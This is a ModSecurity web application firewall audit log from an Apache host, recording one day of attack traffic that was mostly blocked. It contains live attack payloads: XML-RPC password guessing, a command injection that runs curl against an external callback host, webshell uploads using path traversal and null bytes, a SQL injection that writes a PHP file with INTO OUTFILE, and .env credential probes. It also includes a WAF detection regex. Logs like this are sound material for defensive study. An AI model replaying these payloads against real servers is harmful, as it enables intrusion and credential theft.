combined=321, p1=282, p2=0, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60fece5c-Z-- --3a71e90a-A-- [22/May/2025:13:36:36 +0700] aC7F9H0O04WKE1HJ5iRbywAAAAk 103.236.140.4 49002 103.236.140.4 8181 --3a71e90a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.172.172.35 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.172.172.35 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3a71e90a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel& --3a71e90a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a71e90a-E-- --3a71e90a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1747895796133695 5433 (- - -) Stopwatch2: 1747895796133695 5433; combined=4017, p1=409, p2=3366, p3=27, p4=32, p5=109, sr=76, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a71e90a-Z-- --7ec42e11-A-- [22/May/2025:13:39:21 +0700] aC7GmeThJmFSRJ5-OZe6WwAAAFM 103.236.140.4 51540 103.236.140.4 8181 --7ec42e11-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 171 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-thrift X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168483514 --7ec42e11-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0mbkqa4kqtm561jt3n0kbr6bmt97gt9j.oast.fun`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --7ec42e11-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec42e11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747895961123405 3107 (- - -) Stopwatch2: 1747895961123405 3107; combined=2036, p1=467, p2=1498, p3=21, p4=23, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ec42e11-Z-- --ae58ac7c-A-- [22/May/2025:14:17:26 +0700] aC7PhuThJmFSRJ5-OZe_sgAAAFI 103.236.140.4 60308 103.236.140.4 8181 --ae58ac7c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ae58ac7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae58ac7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898246461938 2972 (- - -) Stopwatch2: 1747898246461938 2972; combined=1365, p1=466, p2=861, p3=0, p4=0, p5=38, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae58ac7c-Z-- --bbc81e01-A-- [22/May/2025:14:18:58 +0700] aC7P4uThJmFSRJ5-OZe_xQAAAEE 103.236.140.4 60370 103.236.140.4 8181 --bbc81e01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1 Accept-Charset: utf-8 --bbc81e01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbc81e01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747898338190590 670 (- - -) Stopwatch2: 1747898338190590 670; combined=273, p1=241, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbc81e01-Z-- --36f9af49-A-- [22/May/2025:14:19:24 +0700] aC7P_OThJmFSRJ5-OZe_xgAAAE0 103.236.140.4 60380 103.236.140.4 8181 --36f9af49-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 496 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --36f9af49-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel-123websitedev --36f9af49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f9af49-E-- --36f9af49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898364166856 5634 (- - -) Stopwatch2: 1747898364166856 5634; combined=4030, p1=476, p2=3390, p3=0, p4=0, p5=97, sr=84, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f9af49-Z-- --8e915419-A-- [22/May/2025:14:22:30 +0700] aC7QtuThJmFSRJ5-OZe_7gAAAFg 103.236.140.4 60504 103.236.140.4 8181 --8e915419-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8e915419-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaAdHeL@1234 --8e915419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e915419-E-- --8e915419-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898550908734 4928 (- - -) Stopwatch2: 1747898550908734 4928; combined=3658, p1=379, p2=3092, p3=0, p4=0, p5=110, sr=82, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e915419-Z-- --5ee62865-A-- [22/May/2025:14:23:13 +0700] aC7Q4eThJmFSRJ5-OZe__AAAAEg 103.236.140.4 60546 103.236.140.4 8181 --5ee62865-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.87.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.87.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ee62865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ee62865-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898593968801 2702 (- - -) Stopwatch2: 1747898593968801 2702; combined=1230, p1=433, p2=768, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ee62865-Z-- --19d17727-A-- [22/May/2025:14:27:24 +0700] aC7R3OThJmFSRJ5-OZfAMAAAAEA 103.236.140.4 60742 103.236.140.4 8181 --19d17727-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --19d17727-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaadhel@pass --19d17727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19d17727-E-- --19d17727-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898844411591 5406 (- - -) Stopwatch2: 1747898844411591 5406; combined=3984, p1=457, p2=3360, p3=0, p4=0, p5=98, sr=90, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19d17727-Z-- --53e5ad00-A-- [22/May/2025:14:33:38 +0700] aC7TUuThJmFSRJ5-OZfAoAAAAFE 103.236.140.4 32866 103.236.140.4 8181 --53e5ad00-B-- POST /manager/teletext/material/rewrite.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 ------WebKitFormBoundaryOKldnDPT: close Content-Disposition: form-data; name="tmp_name"; filename="test.php" Content-Type: image/png X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168576918 --53e5ad00-C-- ------WebKitFormBoundaryOKldnDPT Content-Disposition: form-data; name="uploadtime" ------WebKitFormBoundaryOKldnDPT-- --53e5ad00-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e5ad00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=image/png"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747899218489270 3461 (- - -) Stopwatch2: 1747899218489270 3461; combined=2331, p1=444, p2=1724, p3=68, p4=39, p5=56, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e5ad00-Z-- --059bcd5c-A-- [22/May/2025:14:33:38 +0700] aC7TUiektx75wRFPQyjrWQAAANM 103.236.140.4 32880 103.236.140.4 8181 --059bcd5c-B-- POST /mp/login/../uploadControl/uploadFile HTTP/1.0 Host: 218.95.66.214 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 218.95.66.214 X-Forwarded-Server: 218.95.66.214 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 303 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp --059bcd5c-C-- ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: application/octet-stream clyvxpyjtc ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryoDIsCqVMmF83ptmp --059bcd5c-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --059bcd5c-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||218.95.66.214|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747899218492491 3031 (- - -) Stopwatch2: 1747899218492491 3031; combined=2031, p1=357, p2=1604, p3=22, p4=22, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --059bcd5c-Z-- --aec3cb43-A-- [22/May/2025:14:33:40 +0700] aC7TVOThJmFSRJ5-OZfApAAAAEg 103.236.140.4 32896 103.236.140.4 8181 --aec3cb43-B-- POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../rnybpglt.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/octet-stream X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168484116 --aec3cb43-C-- file error --aec3cb43-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aec3cb43-E-- --aec3cb43-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=../rnybpglt.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899220485044 3552 (- - -) Stopwatch2: 1747899220485044 3552; combined=1673, p1=543, p2=1096, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aec3cb43-Z-- --e87e624f-A-- [22/May/2025:14:33:41 +0700] aC7TVX0O04WKE1HJ5iRhCwAAABA 103.236.140.4 32916 103.236.140.4 8181 --e87e624f-B-- GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.0 Host: 222.77.136.93 Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 222.77.136.93 X-Forwarded-Server: 222.77.136.93 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 --e87e624f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e87e624f-E-- --e87e624f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||222.77.136.93|F|2"] [data "Matched Data: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi' found within MATCHED_VAR: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899221488926 3365 (- - -) Stopwatch2: 1747899221488926 3365; combined=2369, p1=374, p2=1968, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e87e624f-Z-- --f4cbc74d-A-- [22/May/2025:14:33:41 +0700] aC7TVeThJmFSRJ5-OZfApwAAAEA 103.236.140.4 32922 103.236.140.4 8181 --f4cbc74d-B-- POST /uapws/saveDoc.ajax?ws=/../../fyw6z.jspx%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 314 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 162990470 --f4cbc74d-C-- content= out.println("vsilhmpzse");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --f4cbc74d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4cbc74d-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../fyw6z.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899221490272 4465 (- - -) Stopwatch2: 1747899221490272 4465; combined=3016, p1=403, p2=2583, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4cbc74d-Z-- --1c85f836-A-- [22/May/2025:14:33:41 +0700] aC7TVeThJmFSRJ5-OZfAqAAAAFQ 103.236.140.4 32926 103.236.140.4 8181 --1c85f836-B-- POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=wahaaqzbta.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 27 User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202) Accept: */* Accept-Language: en Content-Encoding: UTF_8 Content-Type: application/octet-stream serverEnable: localserver X-Forwarded-For: 45.32.66.146 Cookie: LA_K1=langid X-Varnish: 168484119 --1c85f836-C-- 2xQufet7slhcePnWnsiM5YP4rrJ --1c85f836-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c85f836-E-- --1c85f836-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=wahaaqzbta.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899221492733 3576 (- - -) Stopwatch2: 1747899221492733 3576; combined=2163, p1=908, p2=1227, p3=0, p4=0, p5=27, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c85f836-Z-- --e4bb0552-A-- [22/May/2025:14:41:01 +0700] aC7VDWfriXjg62qQwE9RGQAAAIk 103.236.140.4 34546 103.236.140.4 8181 --e4bb0552-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --e4bb0552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4bb0552-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899661586475 787 (- - -) Stopwatch2: 1747899661586475 787; combined=328, p1=289, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 